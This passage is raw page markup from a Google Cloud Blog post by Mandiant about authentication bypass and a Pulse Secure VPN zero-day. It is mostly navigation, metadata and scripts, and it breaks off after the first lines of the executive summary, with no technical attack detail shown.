機械学習\",\"/blog/ja/ai-machine-learning\"],[\"生産性とコラボレーション\",\"/blog/ja/productivity-collaboration\"],[\"アイデンティティとセキュリティ\",\"/blog/ja/identity-and-security\"],[\"未来の働き方\",\"/blog/ja/future-of-work\"],[\"ハイブリッドな働き方\",\"/blog/ja/hybrid-work\"],[\"顧客事例\",\"/blog/ja/customer-stories\"],[\"デベロッパー\",\"/blog/ja/developers-practitioners\"],[\"パートナー\",\"/blog/ja/partners\"],[\"イベント\",\"/blog/ja/events\"],[\"公共部門\",\"/blog/ja/public-sector\"]]]],[\"製品ニュース\",null,[[[\"Gmail\",\"/blog/ja/gmail\"],[\"Meet\",\"/blog/ja/meet\"],[\"Chat and Spaces\",\"/blog/ja/chat-spaces\"],[\"ドライブ\",\"/blog/ja/drive\"],[\"ドキュメント\",\"/blog/ja/docs\"],[\"スプレッドシート\",\"/blog/ja/sheets\"]]]]]]],[\"ko\",[[[\"주제\",null,[[[\"제품 업데이트\",\"/blog/ko/product-announcements\"],[\"AI 및 머신러닝\",\"/blog/ko/ai-machine-learning\"],[\"생산성 및 공동작업\",\"/blog/ko/productivity-collaboration\"],[\"인증 및 보안 \",\"/blog/ko/identity-and-security\"],[\"Future of Work\",\"/blog/ko/future-of-work\"],[\"하이브리드 업무\",\"/blog/ko/hybrid-work\"],[\"고객 사례\",\"/blog/ko/customer-stories\"],[\"개발자\",\"/blog/ko/developers-practitioners\"],[\"파트너\",\"/blog/ko/partners\"],[\"이벤트\",\"/blog/ko/events\"],[\"공공부문\",\"/blog/ko/public-sector\"]]]],[\"제품 소식\",null,[[[\"Gmail\",\"/blog/ko/gmail\"],[\"Meet\",\"/blog/ko/meet\"],[\"Chat 및 Spaces\",\"/blog/ko/chat-spaces\"],[\"Drive\",\"/blog/ko/drive\"],[\"Docs\",\"/blog/ko/docs\"],[\"Sheets\",\"/blog/ko/sheets\"]]]]]]]],null,[[\"de\",[[[[[\"Enthaltene 
"); if(!(g instanceof Array)){var v;var w=typeof Symbol!="undefined"&&Symbol.iterator&&g[Symbol.iterator];if(w)v=w.call(g);else if(typeof g.length=="number")v={next:e()};else throw Error(String(g)+" is not an iterable or ArrayLike");for(var x,y=[];!(x=v.next()).done;)y.push(x.value)};var z=function(a){return{trigger:function(b){var c=a.j(b.type);c||(r(a,b.type),c=a.j(b.type));var d=b.target||b.srcElement;c&&c(b.type,b,d.ownerDocument.documentElement)},configure:function(b){b(a)}}}(function(){var a=window,b=new u(a.document.documentElement),c=new p(b);g.forEach(function(h){return r(c,h)});var d,k;"onwebkitanimationend"in a&&(d="webkitAnimationEnd");r(c,"animationend",d);"onwebkittransitionend"in a&&(k="webkitTransitionEnd");r(c,"transitionend",k);return{s:c,u:b}}().s),A=["BOQ_wizbind"], C=window||l;A[0]in C||typeof C.execScript=="undefined"||C.execScript("var "+A[0]);for(var D;A.length&&(D=A.shift());)A.length||z===void 0?C[D]&&C[D]!==Object.prototype[D]?C=C[D]:C=C[D]={}:C[D]=z;}).call(this); </script><script noCollect src="https://www.gstatic.com/_/mss/boq-cloudx-web-blog/_/js/k=boq-cloudx-web-blog.TransformBlogUi.en_US.gC3IVRdc-js.es5.O/am=OBgwCw/d=1/excm=_b,_tp,articleview/ed=1/dg=0/wt=2/ujg=1/rs=AHrnUqUC0U47L_N8kMcLkQijaVUP_3FZOw/m=_b,_tp" defer id="base-js" fetchpriority="high" nonce="-49Bz_4wsckd3k4vDG-wCQ"></script><script nonce="-49Bz_4wsckd3k4vDG-wCQ">if (window.BOQ_loadedInitialJS) {onJsLoad();} else {document.getElementById('base-js').addEventListener('load', onJsLoad, false);}</script><script nonce="-49Bz_4wsckd3k4vDG-wCQ"> window['_wjdc'] = function (d) {window['_wjdd'] = d}; </script><title>Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog</title><meta name="description" content="We examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells."><meta name="robots" content="max-image-preview:large"><meta property="og:title" 
content="Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog"><meta property="og:type" content="website"><meta property="og:url" content="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"><meta property="og:image" content="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png"><meta property="og:description" content="We examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells."><meta property="og:site_name" content="Google Cloud Blog"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:url" content="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"><meta name="twitter:title" content="Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog"><meta name="twitter:description" content="We examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells."><meta name="twitter:image" content="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png"><meta name="twitter:site" content="@googlecloud"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","@id":"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day","headline":"Authentication Bypass Techniques and Pulse Secure Zero-Day","description":"We examine multiple techniques for bypassing single \u0026 multifactor authentication on Pulse Secure VPN devices and maintaining access through 
webshells.","image":"https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png","author":[{"@type":"Person","name":"Mandiant ","url":""}],"datePublished":"2021-04-20","publisher":{"@type":"Organization","name":"Google Cloud","logo":{"@type":"ImageObject","url":"https://www.gstatic.com/devrel-devsite/prod/v8bb8fa0afe9a8c3a776ebeb25d421bb443344d789b3607754dfabea418b8c4be/cloud/images/cloud-logo.svg"}},"url":"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day","keywords":["Threat Intelligence","Security \u0026 Identity"],"timeRequired":"PT31M"}</script><link rel="canonical" href="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/"><meta name="track-metadata-page_post_title" content="Authentication Bypass Techniques and Pulse Secure Zero-Day"><meta name="track-metadata-page_post_labels" content="Threat Intelligence"><meta name="track-metadata-page_first_published" content="2024-03-26 06:03:00"><meta name="track-metadata-page_last_published" content="2021-04-20 11:04:00"><meta name="track-metadata-page_post_author" content="Mandiant "><meta name="track-metadata-page_post_author_role" content=""><header jsaction="rcuQ6b:npT2md" jscontroller="o60eef" class="glue-header nRhiJb-tJHJj-OWXEXe-kFx1Ae" id="kO001e"><a href="./#content" class="glue-header__link glue-header__skip-content">Jump to Content</a><div class="glue-header__bar glue-header__bar--mobile DFb9Jf" track-metadata-module="header"><div class="nRhiJb-mb9u9d"><div class="glue-header__container JF2WI"><div class="nRhiJb-o2XRw-yHKmmc lUwpmd"><div class="nRhiJb-rSCjMe"><a class="nRhiJb-rSCjMe-hSRGPd" href="https://cloud.google.com/" title="Google Cloud" track-name="google cloud"track-type="blog 
5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01 2.03-1.36 3.5-3.1 3.5z"></path><path fill="#FBBC05" d="M38 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#34A853" d="M58 .24h2.51v17.57H58z"></path><path fill="#EA4335" d="M68.26 15.52c-1.3 0-2.22-.59-2.82-1.76l7.77-3.21-.26-.66c-.48-1.3-1.96-3.7-4.97-3.7-2.99 0-5.48 2.35-5.48 5.81 0 3.26 2.46 5.81 5.76 5.81 2.66 0 4.2-1.63 4.84-2.57l-1.98-1.32c-.66.96-1.56 1.6-2.86 1.6zm-.18-7.15c1.03 0 1.91.53 2.2 1.28l-5.25 2.17c0-2.44 1.73-3.45 3.05-3.45z"></path></svg></div><span class="nRhiJb-rSCjMe-OWXEXe-UBMNlb khBwGd">Cloud</span></a></div></div><div class="nRhiJb-o2XRw-yHKmmc UrjqX"><div class="nRhiJb-rSCjMe"><a class="nRhiJb-rSCjMe-hSRGPd" href="https://cloud.google.com/blog" title="Google Cloud Blog" track-name="blog"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog"track-metadata-module="header"><span class="nRhiJb-rSCjMe-OWXEXe-UBMNlb khBwGd">Blog</span></a></div></div></div><div class="glue-header__container glue-header__stepped-nav LKvi8b" role="navigation"><div class="glue-header__stepped-nav-controls-container"><div class="glue-header__stepped-nav-controls"><div class="glue-header__stepped-nav-controls-arrow"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G glue-header__stepped-nav-subnav-icon" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg></div><div class="glue-header__stepped-nav-controls-title glue-header__link"></div></div></div><div 
class="glue-header__stepped-nav-menus"></div></div><div class="glue-header__container nRhiJb-J6KYL-OWXEXe-Q4irje"><nav class="glue-header__link-bar"><ul class="glue-header__list glue-header__list--nested glue-header__deep-nav URiJfb"><li class="glue-header__item "><a class="glue-header__link">Solutions &amp; technology<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/ai-machine-learning" track-name="ai &amp; machine learning"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/ai-machine-learning"track-metadata-module="header"><span>AI &amp; Machine Learning</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/api-management" track-name="api management"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/api-management"track-metadata-module="header"><span>API Management</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/application-development" track-name="application development"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/application-development"track-metadata-module="header"><span>Application Development</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/application-modernization" track-name="application modernization"track-type="blog 
nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/application-modernization"track-metadata-module="header"><span>Application Modernization</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/chrome-enterprise" track-name="chrome enterprise"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/chrome-enterprise"track-metadata-module="header"><span>Chrome Enterprise</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/compute" track-name="compute"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/compute"track-metadata-module="header"><span>Compute</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/containers-kubernetes" track-name="containers &amp; kubernetes"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/containers-kubernetes"track-metadata-module="header"><span>Containers &amp; Kubernetes</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/data-analytics" track-name="data analytics"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/data-analytics"track-metadata-module="header"><span>Data Analytics</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/databases" track-name="databases"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/databases"track-metadata-module="header"><span>Databases</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " 
href="https://cloud.google.com/blog/products/devops-sre" track-name="devops &amp; sre"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/devops-sre"track-metadata-module="header"><span>DevOps &amp; SRE</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/maps-geospatial" track-name="maps &amp; geospatial"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/maps-geospatial"track-metadata-module="header"><span>Maps &amp; Geospatial</span></a></li><li class="glue-header__item "><a class="glue-header__link janap">Security<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/identity-security" track-name="security &amp; identity"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/identity-security"track-metadata-module="header"><span>Security &amp; Identity</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/threat-intelligence" track-name="threat intelligence"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence"track-metadata-module="header"><span>Threat Intelligence</span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/infrastructure" track-name="infrastructure"track-type="blog 
nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/infrastructure"track-metadata-module="header"><span>Infrastructure</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/infrastructure-modernization" track-name="infrastructure modernization"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/infrastructure-modernization"track-metadata-module="header"><span>Infrastructure Modernization</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/networking" track-name="networking"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/networking"track-metadata-module="header"><span>Networking</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/productivity-collaboration" track-name="productivity &amp; collaboration"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/productivity-collaboration"track-metadata-module="header"><span>Productivity &amp; Collaboration</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/sap-google-cloud" track-name="sap on google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/sap-google-cloud"track-metadata-module="header"><span>SAP on Google Cloud</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/storage-data-transfer" track-name="storage &amp; data transfer"track-type="blog 
nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/storage-data-transfer"track-metadata-module="header"><span>Storage &amp; Data Transfer</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/sustainability" track-name="sustainability"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/sustainability"track-metadata-module="header"><span>Sustainability</span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link">Ecosystem<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/transform" track-name="it leaders"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/transform"track-metadata-module="header"><span>IT Leaders</span></a></li><li class="glue-header__item "><a class="glue-header__link janap">Industries<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/financial-services" track-name="financial services"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/financial-services"track-metadata-module="header"><span>Financial Services</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/healthcare-life-sciences" track-name="healthcare &amp; life sciences"track-type="blog 
nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/healthcare-life-sciences"track-metadata-module="header"><span>Healthcare &amp; Life Sciences</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/manufacturing" track-name="manufacturing"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/manufacturing"track-metadata-module="header"><span>Manufacturing</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/media-entertainment" track-name="media &amp; entertainment"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/media-entertainment"track-metadata-module="header"><span>Media &amp; Entertainment</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/public-sector" track-name="public sector"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/public-sector"track-metadata-module="header"><span>Public Sector</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/retail" track-name="retail"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/retail"track-metadata-module="header"><span>Retail</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/supply-chain-logistics" track-name="supply chain"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/supply-chain-logistics"track-metadata-module="header"><span>Supply Chain</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " 
href="https://cloud.google.com/blog/topics/telecommunications" track-name="telecommunications"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/telecommunications"track-metadata-module="header"><span>Telecommunications</span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/partners" track-name="partners"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/partners"track-metadata-module="header"><span>Partners</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/startups" track-name="startups &amp; smb"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/startups"track-metadata-module="header"><span>Startups &amp; SMB</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/training-certifications" track-name="training &amp; certifications"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/training-certifications"track-metadata-module="header"><span>Training &amp; Certifications</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/inside-google-cloud" track-name="inside google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/inside-google-cloud"track-metadata-module="header"><span>Inside Google Cloud</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/google-cloud-next" track-name="google cloud next &amp; events"track-type="blog 
nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/google-cloud-next"track-metadata-module="header"><span>Google Cloud Next &amp; Events</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://mapsplatform.google.com/resources/blog/" track-name="google maps platform"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="mapsplatform.google.com/resources/blog/"track-metadata-module="header" target="_blank"><span>Google Maps Platform<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G FsOzib nRhiJb-tHaKme-AipIyc" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="m8.9 16.075 5.4-5.4v2.675h1.4V8.3h-5.05v1.4h2.65l-5.375 5.375ZM12 21.3q-1.925 0-3.625-.738-1.7-.737-2.95-1.987-1.25-1.25-1.987-2.95Q2.7 13.925 2.7 12t.738-3.625q.737-1.7 1.987-2.95 1.25-1.25 2.95-1.988Q10.075 2.7 12 2.7t3.625.737q1.7.738 2.95 1.988 1.25 1.25 1.987 2.95.738 1.7.738 3.625t-.738 3.625q-.737 1.7-1.987 2.95-1.25 1.25-2.95 1.987-1.7.738-3.625.738Z"></path></svg></span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://workspace.google.com/blog" track-name="google workspace"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="workspace.google.com/blog"track-metadata-module="header" target="_blank"><span>Google Workspace<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G FsOzib nRhiJb-tHaKme-AipIyc" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="m8.9 16.075 5.4-5.4v2.675h1.4V8.3h-5.05v1.4h2.65l-5.375 5.375ZM12 21.3q-1.925 0-3.625-.738-1.7-.737-2.95-1.987-1.25-1.25-1.987-2.95Q2.7 13.925 2.7 12t.738-3.625q.737-1.7 1.987-2.95 1.25-1.25 2.95-1.988Q10.075 2.7 12 2.7t3.625.737q1.7.738 2.95 1.988 1.25 1.25 1.987 2.95.738 1.7.738 3.625t-.738 3.625q-.737 1.7-1.987 2.95-1.25 1.25-2.95 1.987-1.7.738-3.625.738Z"></path></svg></span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link " 
href="https://cloud.google.com/blog/topics/developers-practitioners" track-name="developers &amp; practitioners"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/developers-practitioners"track-metadata-module="header"><span>Developers &amp; Practitioners</span></a></li><li class="glue-header__item "><a class="glue-header__link " href="https://cloud.google.com/transform" track-name="transform with google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/transform"track-metadata-module="header"><span>Transform with Google Cloud</span></a></li></ul></nav></div><div class="glue-header__container ca6rub nRhiJb-J6KYL-OWXEXe-SU0ZEf"><div class="nRhiJb-GUI8l"><a class="nRhiJb-LgbsSe nRhiJb-LgbsSe-OWXEXe-pSzOP-o6Shpd " href="https://cloud.google.com/contact/" track-name="contact sales"track-type="blog nav"track-metadata-eventdetail="cloud.google.com/contact/"track-metadata-module="header" track-name="contact sales"track-type="button"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/contact/">Contact sales </a><a class="nRhiJb-LgbsSe nRhiJb-LgbsSe-OWXEXe-CNusmb-o6Shpd " href="https://console.cloud.google.com/freetrial/" track-name="get started for free"track-type="blog nav"track-metadata-eventdetail="console.cloud.google.com/freetrial/"track-metadata-module="header" track-name="get started for free"track-type="button"track-metadata-position="nav"track-metadata-eventdetail="console.cloud.google.com/freetrial/">Get started for free </a></div><div class="GKI4ub"><div class="Jhiezd"><form action="/blog/search/" class="A2C6Ob"><input class="BAhdXd" jsname="oJAbI" name="query" type="text" placeholder="Find an article..."><input type="hidden" name="language" value=en hidden><input type="hidden" name="category" value=article hidden><input type="hidden" name="paginate" value="25" hidden><input type="hidden" name="order" value="newest" hidden><input 
type="hidden" name="hl" value=en hidden><span class="A0lwXc" jsname="D8MWrd" aria-label="Show the search input field." role="button" jsaction="click:jUF4E"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c" viewBox="0 0 24 24" role="presentation" aria-hidden="true" width="40" height="22"><path d="M20.49 19l-5.73-5.73C15.53 12.2 16 10.91 16 9.5A6.5 6.5 0 1 0 9.5 16c1.41 0 2.7-.47 3.77-1.24L19 20.49 20.49 19zM5 9.5C5 7.01 7.01 5 9.5 5S14 7.01 14 9.5 11.99 14 9.5 14 5 11.99 5 9.5z"></path></svg></span></form></div></div></div></div></div><div class="glue-header__drawer-backdrop"></div></header><script nonce="-49Bz_4wsckd3k4vDG-wCQ">var AF_initDataKeys = ["ds:0"]; var AF_dataServiceRequests = {'ds:0' : {id:'nInjGe',request:["cloudblog","topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day","en"]}}; var AF_initDataChunkQueue = []; var AF_initDataCallback; var AF_initDataInitializeCallback; if (AF_initDataInitializeCallback) {AF_initDataInitializeCallback(AF_initDataKeys, AF_initDataChunkQueue, AF_dataServiceRequests);}if (!AF_initDataCallback) {AF_initDataCallback = function(chunk) {AF_initDataChunkQueue.push(chunk);};}</script></head><body id="yDmH0d" jscontroller="pjICDe" jsaction="rcuQ6b:npT2md; click:FAbpgf; auxclick:FAbpgf" class="tQj5Y ghyPEc IqBfM ecJEib EWZcud nRhiJb-qJTHM" data-has-header="true" data-has-footer="true"><script aria-hidden="true" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.wiz_progress&&window.wiz_progress();</script><div class="VUoKZ" aria-hidden="true"><div class="TRHLAc"></div></div><c-wiz jsrenderer="zPZHOe" class="SSPGKf" jsdata="deferred-i1" data-p="%.@.&quot;cloudblog&quot;,&quot;topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day&quot;,&quot;en&quot;]" data-node-index="0;0" jsmodel="hc6Ubd" view c-wiz data-ogpc><div class="T4LgNb " jsname="a9kxte"><div jsname="qJTHM" class="kFwPee"><article class="nRhiJb-qJTHM" jsaction="rcuQ6b:npT2md" 
jscontroller="kxO7ab"><section class="nRhiJb-DARUcf"><div class="Wdmc0c nRhiJb-DbgRPb-wNfPc-cGMI2b"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c nRhiJb-BFbNVe-r8s4j-bMElCd dIsJJe" track-name="threat intelligence"track-type="tag">Threat Intelligence</div><div class="nRhiJb-ObfsIf"><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-R6PoUb"></div><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-EehZO nRhiJb-fmcmS-oXtfBe"><h1 class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-ibL1re"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-ibL1re"><span class="FewWi"></span>Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day</div></h1></div></div><div class="nRhiJb-fmcmS-oXtfBe dEogG">April 20, 2021</div></div></section><div class="EKklye">
<div><section class="nRhiJb-DARUcf"><div class="nRhiJb-DbgRPb-wNfPc-ma6Yeb nRhiJb-DbgRPb-wNfPc-cGMI2b"><section class="DA9Qj nRhiJb-ObfsIf nRhiJb-fmcmS-oXtfBe"><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf"></div><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c"><h5 class="cHE8Ub Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c">Mandiant </h5><p class="nRhiJb-qJTHM khCp7b"></p></div></section></div></section><div class="nRhiJb-DARUcf"><div class="nRhiJb-ObfsIf nRhiJb-DbgRPb-wNfPc-ma6Yeb nRhiJb-DbgRPb-qWD73c-cGMI2b"><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-ibL1re dzoHJ"></div><div class="OYL9D nRhiJb-kR0ZEf-OWXEXe-GV1x9e-OiUrBf" jsname="tx2NYc"><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Written by: Dan Perez, Sarah Jones, Greg Wood, Stephen Eckels</p> <hr></span></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h4>Executive Summary</h4> <ul> <li>Mandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.</li> <li>This blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse Secure VPN devices, 
